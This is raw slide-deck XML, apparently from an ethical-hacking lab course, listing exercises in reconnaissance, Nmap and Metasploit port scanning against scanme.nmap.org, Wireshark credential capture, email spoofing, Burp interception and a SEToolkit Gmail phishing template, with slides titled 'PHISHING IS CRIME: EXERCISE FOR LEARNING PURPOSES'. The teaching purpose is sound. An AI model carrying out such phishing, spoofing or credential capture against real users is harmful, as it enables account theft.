          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528363" y="1472963"/>
            <a:ext cx="3645194" cy="351984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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="86148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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101469" y="1401079"/>
            <a:ext cx="7086600" cy="13689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SzPts val="4500"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social Engineering using SEToolkit</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36"/>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Social Engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="924" name="Google Shape;924;p136"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412306" y="1608807"/>
            <a:ext cx="6218026" cy="26550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37"/>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Few Example of Phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="931" name="Google Shape;931;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="830025" y="1543032"/>
            <a:ext cx="4017440" cy="1668856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="932" name="Google Shape;932;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847456" y="1553026"/>
            <a:ext cx="3712594" cy="1648870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="933" name="Google Shape;933;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661788" y="3272531"/>
            <a:ext cx="4017431" cy="16089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38"/>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dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Few Example of Phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="940" name="Google Shape;940;p138"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="47916"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="349819" y="1359075"/>
            <a:ext cx="3860868" cy="3486452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p138"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="66540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4324988" y="1359075"/>
            <a:ext cx="4508308" cy="3486452"/>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39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="623794" y="1043250"/>
            <a:ext cx="6242287" cy="393742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40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="955" name="Google Shape;955;p140"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648056" y="1020113"/>
            <a:ext cx="5611481" cy="40454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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="263" name="Google Shape;263;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1017725"/>
            <a:ext cx="9144000" cy="39765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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Google Shape;962;p141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393863" y="1912088"/>
            <a:ext cx="8411023" cy="28311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42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="969" name="Google Shape;969;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1023131"/>
            <a:ext cx="6836700" cy="400606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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="976" name="Google Shape;976;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1103906"/>
            <a:ext cx="6824568" cy="3925294"/>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44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1043250"/>
            <a:ext cx="6678993" cy="39859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45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181388" y="573281"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="990" name="Google Shape;990;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393319" y="1055381"/>
            <a:ext cx="6375730" cy="392529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46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205650" y="0"/>
            <a:ext cx="88359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PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Google Shape;997;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="885563"/>
            <a:ext cx="8268152" cy="4143637"/>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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="317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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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148"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Host Discovery Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448681" y="1390444"/>
            <a:ext cx="5939043" cy="370171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49"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service Discovery Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1016" name="Google Shape;1016;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622494" y="1329788"/>
            <a:ext cx="5900944" cy="3704531"/>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50"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port Scanning Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1718217" y="1245169"/>
            <a:ext cx="6042788" cy="380128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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1195925"/>
            <a:ext cx="9144000" cy="3798349"/>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51"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port Scanning Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570013" y="1293413"/>
            <a:ext cx="5823677" cy="374090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152"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="429950"/>
            <a:ext cx="6125400" cy="7275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Port Scanning Using Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Google Shape;1037;p152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921938" y="1346531"/>
            <a:ext cx="7497000" cy="1854900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="6857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 sz="1800" b="0" i="0" u="sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="B42419"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>scanner/portscan/tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) &gt; set rhost scanme.nmap.org</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rhost =&gt; scanme.nmap.org</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n" sz="1800" b="0" i="0" u="sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
